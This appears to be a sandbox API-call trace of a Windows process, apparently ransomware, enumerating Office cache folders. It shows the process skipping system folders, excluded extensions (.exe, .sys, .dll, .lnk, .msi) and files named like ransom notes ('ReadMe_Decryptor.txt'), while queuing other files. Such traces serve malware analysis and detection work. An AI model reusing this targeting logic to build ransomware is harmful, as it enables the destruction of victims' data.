[0106.917] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\", lpString2="{90140000-0019-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C" [0106.917] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0106.917] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.917] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.917] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0106.917] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.918] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.918] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.918] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.918] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.918] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.918] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.918] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.918] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\Intel") returned 1 [0106.918] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\msys32") returned -1 [0106.918] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\Qt") returned -1 [0106.918] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0106.918] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files") returned -1 [0106.918] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0106.918] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files (x86)") returned -1 [0106.918] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\") returned="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\" [0106.918] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\") returned 63 [0106.918] FindFirstFileExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758dc8 [0107.144] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0107.144] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0107.145] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0107.145] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0107.145] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1 [0107.145] lstrcmpW (lpString1="PublisherMUI.msi", lpString2=".") returned 1 [0107.145] lstrcmpW (lpString1="PublisherMUI.msi", lpString2="..") returned 1 [0107.145] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.145] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="Decryptor_Info.hta") returned 1 [0107.145] PathFindExtensionW (pszPath="PublisherMUI.msi") returned=".msi" [0107.145] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0107.145] lstrcmpiW (lpString1=".msi", lpString2=".sys") returned -1 [0107.145] lstrcmpiW (lpString1=".msi", lpString2=".lnk") returned 1 [0107.145] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0107.146] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0107.146] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PublisherMUI.xml", cAlternateFileName="PUBLIS~1.XML")) returned 1 [0107.146] lstrcmpW (lpString1="PublisherMUI.xml", lpString2=".") returned 1 [0107.146] lstrcmpW (lpString1="PublisherMUI.xml", lpString2="..") returned 1 [0107.146] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.146] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.146] PathFindExtensionW (pszPath="PublisherMUI.xml") returned=".xml" [0107.146] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.146] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.146] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.146] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.146] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.146] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.146] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc2d0 [0107.146] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.146] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3998 [0107.146] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc2d0 | out: hHeap=0x6d0000) returned 1 [0107.146] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc47e320, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x97f3f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PubLR.cab", cAlternateFileName="")) returned 1 [0107.147] lstrcmpW (lpString1="PubLR.cab", lpString2=".") returned 1 [0107.147] lstrcmpW (lpString1="PubLR.cab", lpString2="..") returned 1 [0107.147] lstrcmpiW (lpString1="PubLR.cab", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.147] lstrcmpiW (lpString1="PubLR.cab", lpString2="Decryptor_Info.hta") returned 1 [0107.147] PathFindExtensionW (pszPath="PubLR.cab") returned=".cab" [0107.147] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0107.147] lstrcmpiW (lpString1=".cab", lpString2=".sys") returned -1 [0107.147] lstrcmpiW (lpString1=".cab", lpString2=".lnk") returned -1 [0107.147] lstrcmpiW (lpString1=".cab", lpString2=".dll") returned -1 [0107.147] lstrcmpiW (lpString1=".cab", lpString2=".msi") returned -1 [0107.147] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.147] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc2d0 [0107.147] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.147] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3a40 [0107.147] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc2d0 | out: hHeap=0x6d0000) returned 1 [0107.147] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0107.147] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0107.147] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0107.147] lstrcmpiW (lpString1="Setup.xml", lpString2="ReadMe_Decryptor.txt") returned 1 [0107.147] lstrcmpiW (lpString1="Setup.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.148] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0107.148] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.148] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.148] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.148] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.148] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.148] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.148] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc2d0 [0107.148] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.148] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3ae8 [0107.148] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc2d0 | out: hHeap=0x6d0000) returned 1 [0107.148] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0107.148] FindClose (in: hFindFile=0x758dc8 | out: hFindFile=0x758dc8) returned 1 [0107.149] FindNextFileW (in: hFindFile=0x758d08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1 [0107.150] lstrcmpW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0107.150] lstrcmpW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0107.150] lstrlenW (lpString="{90140000-001A-0409-1000-0000000FF1CE}-C") returned 40 [0107.150] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\", lpString2="{90140000-001A-0409-1000-0000000FF1CE}-C" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C" [0107.150] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0107.150] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.150] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0107.150] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0107.150] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0107.150] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0107.150] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0107.150] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0107.150] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0107.150] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0107.150] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0107.150] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0107.150] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\Intel") returned 1 [0107.150] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\msys32") returned -1 [0107.150] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\Qt") returned -1 [0107.150] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\ProgramData") returned -1 [0107.150] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files") returned -1 [0107.150] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\Windows") returned -1 [0107.151] lstrcmpiW (lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="C:\\Program Files (x86)") returned -1 [0107.151] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\") returned="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\" [0107.151] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\") returned 63 [0107.151] FindFirstFileExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758dc8 [0107.362] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0107.362] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0107.400] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0107.400] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0107.400] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1 [0107.400] lstrcmpW (lpString1="OutlkLR.cab", lpString2=".") returned 1 [0107.400] lstrcmpW (lpString1="OutlkLR.cab", lpString2="..") returned 1 [0107.400] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.400] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="Decryptor_Info.hta") returned 1 [0107.400] PathFindExtensionW (pszPath="OutlkLR.cab") returned=".cab" [0107.400] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0107.400] lstrcmpiW (lpString1=".cab", lpString2=".sys") returned -1 [0107.400] lstrcmpiW (lpString1=".cab", lpString2=".lnk") returned -1 [0107.400] lstrcmpiW (lpString1=".cab", lpString2=".dll") returned -1 [0107.400] lstrcmpiW (lpString1=".cab", lpString2=".msi") returned -1 [0107.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.400] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3c38 [0107.400] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.400] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2bba00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OutlookMUI.msi", cAlternateFileName="OUTLOO~1.MSI")) returned 1 [0107.401] lstrcmpW (lpString1="OutlookMUI.msi", lpString2=".") returned 1 [0107.401] lstrcmpW (lpString1="OutlookMUI.msi", lpString2="..") returned 1 [0107.401] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.401] lstrcmpiW (lpString1="OutlookMUI.msi", lpString2="Decryptor_Info.hta") returned 1 [0107.401] PathFindExtensionW (pszPath="OutlookMUI.msi") returned=".msi" [0107.401] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0107.401] lstrcmpiW (lpString1=".msi", lpString2=".sys") returned -1 [0107.401] lstrcmpiW (lpString1=".msi", lpString2=".lnk") returned 1 [0107.401] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0107.401] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0107.401] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OutlookMUI.xml", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0107.401] lstrcmpW (lpString1="OutlookMUI.xml", lpString2=".") returned 1 [0107.401] lstrcmpW (lpString1="OutlookMUI.xml", lpString2="..") returned 1 [0107.401] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="ReadMe_Decryptor.txt") returned -1 [0107.401] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.401] PathFindExtensionW (pszPath="OutlookMUI.xml") returned=".xml" [0107.401] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.401] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.401] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.401] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.401] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.401] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.402] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.402] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.402] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3ce0 [0107.402] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.402] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0107.402] lstrcmpW (lpString1="Setup.xml", lpString2=".") returned 1 [0107.402] lstrcmpW (lpString1="Setup.xml", lpString2="..") returned 1 [0107.402] lstrcmpiW (lpString1="Setup.xml", lpString2="ReadMe_Decryptor.txt") returned 1 [0107.402] lstrcmpiW (lpString1="Setup.xml", lpString2="Decryptor_Info.hta") returned 1 [0107.402] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0107.402] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0107.402] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0107.402] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0107.402] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0107.402] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0107.402] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.402] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.402] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0107.402] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x7a3d88 [0107.402] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.402] FindNextFileW (in: hFindFile=0x758dc8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0107.402] FindClose (in: hFindFile=0x758dc8 | out: hFindFile=0x758dc8) returned 1 [0107.404] FindNextFileW (in: hFindFile=0x758d08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1 [0107.404] lstrcmpW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0107.404] lstrcmpW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0107.404] lstrlenW (lpString="{90140000-001B-0409-1000-0000000FF1CE}-C") returned 40 [0107.404] 